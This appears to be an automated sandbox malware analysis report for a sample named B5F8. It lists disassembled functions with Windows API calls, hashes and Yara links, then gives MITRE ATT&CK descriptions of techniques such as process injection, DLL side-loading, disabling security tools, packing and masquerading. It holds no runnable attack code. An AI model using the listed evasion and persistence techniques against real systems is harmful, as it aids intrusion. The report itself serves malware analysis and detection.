Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
Instruction ID: 3c3b50938be5ce9083167e173f7e6b43bc03bd5c024aac93f6b58452cd9bbf76
Opcode Fuzzy Hash: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
Instruction Fuzzy Hash: F0317875E802599FCB21EFB4CC84BDEB7B6AF44309F1444A6D805AB250DB74EA42DF90

Function 021BC41C Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 021C4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 021C42B4
Part of subcall function 021C4287: lstrcpy.KERNEL32(00000000,?), ref: 021C42E9

Part of subcall function 021C7557: lstrcpy.KERNEL32(00000000), ref: 021C7586
Part of subcall function 021C7557: lstrcat.KERNEL32(00000000), ref: 021C7592

Part of subcall function 021C75A7: lstrlen.KERNEL32(------,021A5D82), ref: 021C75B2
Part of subcall function 021C75A7: lstrcpy.KERNEL32(00000000), ref: 021C75D6
Part of subcall function 021C75A7: lstrcat.KERNEL32(?,------), ref: 021C75E0

Part of subcall function 021C7517: lstrcpy.KERNEL32(00000000), ref: 021C7545

Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 021C40AC
Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 021C40D6
Part of subcall function 021C4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,021A1495,?,0000001A), ref: 021C40E0

lstrcpy.KERNEL32(00000000,00000000), ref: 021BC5B2
lstrcat.KERNEL32(00000000), ref: 021BC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 021BC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021BC629

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
Instruction ID: 0c87986834e980a5c15d9000379f322c334373f09c86cd8618309ada9089d106
Opcode Fuzzy Hash: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
Instruction Fuzzy Hash: 98315675E802599FCB21EFB4CC84ADEB7B6AF44309F1484A5D805AB250DB74EA42DF90

Function 021BC479 Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 021C4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 021C42B4
Part of subcall function 021C4287: lstrcpy.KERNEL32(00000000,?), ref: 021C42E9

Part of subcall function 021C7557: lstrcpy.KERNEL32(00000000), ref: 021C7586
Part of subcall function 021C7557: lstrcat.KERNEL32(00000000), ref: 021C7592

Part of subcall function 021C75A7: lstrlen.KERNEL32(------,021A5D82), ref: 021C75B2
Part of subcall function 021C75A7: lstrcpy.KERNEL32(00000000), ref: 021C75D6
Part of subcall function 021C75A7: lstrcat.KERNEL32(?,------), ref: 021C75E0

Part of subcall function 021C7517: lstrcpy.KERNEL32(00000000), ref: 021C7545

Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 021C40AC
Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 021C40D6
Part of subcall function 021C4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,021A1495,?,0000001A), ref: 021C40E0

lstrcpy.KERNEL32(00000000,00000000), ref: 021BC5B2
lstrcat.KERNEL32(00000000), ref: 021BC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 021BC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021BC629

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
Instruction ID: 64c797a5f9148c3f6242e6f7ac0a8af71e3ad896cc849c154929ea66a9482a79
Opcode Fuzzy Hash: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
Instruction Fuzzy Hash: 4731BC75E802499FCB21EFB4CC84ADEB7B2AF44308F14446AD805AB250DB34DE42DF90

Function 021BC4D0 Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 021C4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 021C42B4
Part of subcall function 021C4287: lstrcpy.KERNEL32(00000000,?), ref: 021C42E9

Part of subcall function 021C7557: lstrcpy.KERNEL32(00000000), ref: 021C7586
Part of subcall function 021C7557: lstrcat.KERNEL32(00000000), ref: 021C7592

Part of subcall function 021C75A7: lstrlen.KERNEL32(------,021A5D82), ref: 021C75B2
Part of subcall function 021C75A7: lstrcpy.KERNEL32(00000000), ref: 021C75D6
Part of subcall function 021C75A7: lstrcat.KERNEL32(?,------), ref: 021C75E0

Part of subcall function 021C7517: lstrcpy.KERNEL32(00000000), ref: 021C7545

Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 021C40AC
Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 021C40D6
Part of subcall function 021C4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,021A1495,?,0000001A), ref: 021C40E0

lstrcpy.KERNEL32(00000000,00000000), ref: 021BC5B2
lstrcat.KERNEL32(00000000), ref: 021BC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 021BC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021BC629

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
Instruction ID: 543c22209c1deea3dadc9032ea367ea409fb564f5abb7f6608f0e7f778c9efcb
Opcode Fuzzy Hash: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
Instruction Fuzzy Hash: 1C318B75E802489FCB21EFB4CC84BDEB7B6AF44309F24446AD815AB250DB34DA02DF90

Function 00421550 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 00421581
lstrcpy.KERNEL32(00000000,?), ref: 004215B9
lstrcpy.KERNEL32(00000000,?), ref: 004215F1
lstrcpy.KERNEL32(00000000,?), ref: 00421629

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
Instruction ID: 80d308abde563585a592328bb7eba962bc113a2ea9b505a2ad5a72594fb3347d
Opcode Fuzzy Hash: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
Instruction Fuzzy Hash: EE211EB4701B029BD724DF3AD958A17B7F5BF54700B444A2EA486D7BA0DB78F840CBA4

Function 00401410 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401510: lstrcpy.KERNEL32(00000000), ref: 0040152D
Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 0040154F
Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401571
Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401593

lstrcpy.KERNEL32(00000000,?), ref: 00401437
lstrcpy.KERNEL32(00000000,?), ref: 00401459
lstrcpy.KERNEL32(00000000,?), ref: 0040147B
lstrcpy.KERNEL32(00000000,?), ref: 004014DF

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
Instruction ID: 368a80f0553ecf631160e054036b62fbe6d7ddfceb8bd69434bdfc69ba453b92
Opcode Fuzzy Hash: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
Instruction Fuzzy Hash: 4A31A575A01B029FC728DF3AD588957BBE5BF48704700492EA956D3BA0DB74F811CB94

Function 021A1673 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 021A1777: lstrcpy.KERNEL32(00000000), ref: 021A1794
Part of subcall function 021A1777: lstrcpy.KERNEL32(00000000,?), ref: 021A17B6
Part of subcall function 021A1777: lstrcpy.KERNEL32(00000000,?), ref: 021A17D8
Part of subcall function 021A1777: lstrcpy.KERNEL32(00000000,?), ref: 021A17FA

lstrcpy.KERNEL32(00000000,?), ref: 021A169E
lstrcpy.KERNEL32(00000000,?), ref: 021A16C0
lstrcpy.KERNEL32(00000000,?), ref: 021A16E2
lstrcpy.KERNEL32(00000000,?), ref: 021A1746

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
Instruction ID: c3972795a081d801cac4249310311210515be18ca4a67cfef76b55e162159ea7
Opcode Fuzzy Hash: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
Instruction Fuzzy Hash: DB31C3B8A41B42AFD724DF7AC998966B7E5BF48305B04492D989AC3F50DB74F410CF90

Function 021A1677 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 021A1777: lstrcpy.KERNEL32(00000000), ref: 021A1794
Part of subcall function 021A1777: lstrcpy.KERNEL32(00000000,?), ref: 021A17B6
Part of subcall function 021A1777: lstrcpy.KERNEL32(00000000,?), ref: 021A17D8
Part of subcall function 021A1777: lstrcpy.KERNEL32(00000000,?), ref: 021A17FA

lstrcpy.KERNEL32(00000000,?), ref: 021A169E
lstrcpy.KERNEL32(00000000,?), ref: 021A16C0
lstrcpy.KERNEL32(00000000,?), ref: 021A16E2
lstrcpy.KERNEL32(00000000,?), ref: 021A1746

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
Instruction ID: 2874d4fcb11060dc16b4209344bcb0d6a6f6159b8c3d98eb666e06782a9877d7
Opcode Fuzzy Hash: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
Instruction Fuzzy Hash: 6131C3B8A41B42AFD724DF3AC998966BBE5BF48305B04492D989AC3F50DB74F410CF90

Function 021C17B7 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 021C17E8
lstrcpy.KERNEL32(00000000,?), ref: 021C1820
lstrcpy.KERNEL32(00000000,?), ref: 021C1858
lstrcpy.KERNEL32(00000000,?), ref: 021C1890

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
Instruction ID: a778ec50471a201be4cf9bb0fd77ed2f972109f481d98ba857bc7a26559c601c
Opcode Fuzzy Hash: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
Instruction Fuzzy Hash: 5621FC78685B029FD734DF7AC998A17B7F6AF54704B24492CD89AC7A41DB34E401CFA0

Function 021BC39D Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

Part of subcall function 021C75A7: lstrlen.KERNEL32(------,021A5D82), ref: 021C75B2
Part of subcall function 021C75A7: lstrcpy.KERNEL32(00000000), ref: 021C75D6
Part of subcall function 021C75A7: lstrcat.KERNEL32(?,------), ref: 021C75E0

Part of subcall function 021C7517: lstrcpy.KERNEL32(00000000), ref: 021C7545

Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 021C40AC
Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 021C40D6
Part of subcall function 021C4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,021A1495,?,0000001A), ref: 021C40E0

lstrcpy.KERNEL32(00000000,00000000), ref: 021BC5B2
lstrcat.KERNEL32(00000000), ref: 021BC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 021BC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021BC629

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$SystemTimelstrlen
String ID:
API String ID: 3486790982-0
Opcode ID: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
Instruction ID: be0c936ad9766c26e99c6fddde18ff5b1d9eac0a03c6bed6aadaa7d0feba4d7e
Opcode Fuzzy Hash: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
Instruction Fuzzy Hash: 29214C75E802499FCB21EFB4CC88AAEB7B6AF44309F185469D401AB250DB74D941DFD0

Function 00406E32 Relevance: 5.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040), ref: 00406E40
memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
HeapAlloc.KERNEL32(00000000), ref: 00406EBB

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocProcess
String ID:
API String ID: 1643994569-0
Opcode ID: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
Instruction ID: 021ca828da5bfa0a796bb6e6c33eee2a11837a2b1fb4363adf8c912b1a52eb88
Opcode Fuzzy Hash: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
Instruction Fuzzy Hash: 9A218CB06007029BEB248B21DC84BBB73E8EB40704F44447DEA47DB684EBB8E951CB95

Function 00401510 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 0040152D
lstrcpy.KERNEL32(00000000,?), ref: 0040154F
lstrcpy.KERNEL32(00000000,?), ref: 00401571
lstrcpy.KERNEL32(00000000,?), ref: 00401593

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
Instruction ID: 156e9cd4061fd8f5e73776b1d1d3add2ecf4c06161da7b3eeeca5abdbe74678b
Opcode Fuzzy Hash: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
Instruction Fuzzy Hash: 86111275A01B02ABDB14AF36D95C927B7F8BF44305304463EA457E7B90EB78E800CB94

Function 021A1777 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 021A1794
lstrcpy.KERNEL32(00000000,?), ref: 021A17B6
lstrcpy.KERNEL32(00000000,?), ref: 021A17D8
lstrcpy.KERNEL32(00000000,?), ref: 021A17FA

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
Instruction ID: e6dbe8c95c2467c9ed8f2b93c5722b77e9aa9531f6131e966faacd946a42e899
Opcode Fuzzy Hash: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
Instruction Fuzzy Hash: 24111F7CA51702ABD7249F75C868927B7FABF44245B04462C985AC3E40EB34E400CFA0

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
